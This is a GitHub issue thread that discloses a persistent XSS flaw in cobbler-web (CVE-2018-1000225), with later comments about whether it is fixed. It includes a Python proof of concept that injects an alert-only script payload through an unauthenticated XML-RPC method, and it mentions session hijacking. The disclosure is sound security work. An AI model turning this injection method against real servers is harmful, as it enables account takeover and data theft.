
Persistent XSS vulnerability in cobbler-web [CVE-2018-1000225] #1917

Open
movermeyer opened this issue Aug 2, 2018 · 2 comments
Comments

@movermeyer movermeyer commented Aug 2, 2018

cobbler-web renders HTML and executes JavaScript payloads that are provided by users.
Combined with authentication problems in the Cobbler XMLRPC API, this allows unauthenticated users to inject malicious payloads into the web UI.

A harmless Proof of Concept script:

```python
import xmlrpc.client

# Connect to the Cobbler XML-RPC API; at the time of the report the private
# _new_event method was reachable without authentication.
cobbler_connection = xmlrpc.client.ServerProxy("http://127.0.0.1/cobbler_api", allow_none=True)

# Event name containing HTML and JavaScript, which cobbler-web renders unescaped.
payload = """
<button onclick="myFunction()">Click me!</button>

<script>
function myFunction() {
    alert("Hah! you clicked!");
}
</script>
"""

cobbler_connection._new_event(payload)
```

Then when you visit the cobbler_web/events endpoint:

[Screenshot: cobbler_js_event]

These payloads can be used to hijack the sessions of administrators and perform actions that the attacker would otherwise be unable to, or to exfiltrate sensitive information.

cobbler-web should sanitize all user-provided inputs and treat them as untrusted. This includes never rendering user-provided HTML, nor executing user-provided JavaScript.

See this post for more discussion.

@movermeyer movermeyer changed the title Persistent XSS vulnerability in cobbler-web Persistent XSS vulnerability in cobbler-web [CVE-2018-1000225] Aug 21, 2018
@meaksh meaksh commented Dec 13, 2018

I think this issue could now be considered as fixed since the private _ methods from the XMLRPC API are not exposed anymore. Also modify_settings now requires an auth token, so IIUC the issue described here is no longer happening.

@opoplawski opoplawski commented Feb 23, 2019

If this is fixed can we please close this. Also, if this is fixed, what version was it fixed in?

@SchoolGuy SchoolGuy added this to Inbox in Backlog Aug 15, 2019
@SchoolGuy SchoolGuy moved this from Inbox to Bug Reports in Backlog Oct 17, 2019
@SchoolGuy SchoolGuy moved this from Bug Reports to To do in Backlog Oct 24, 2019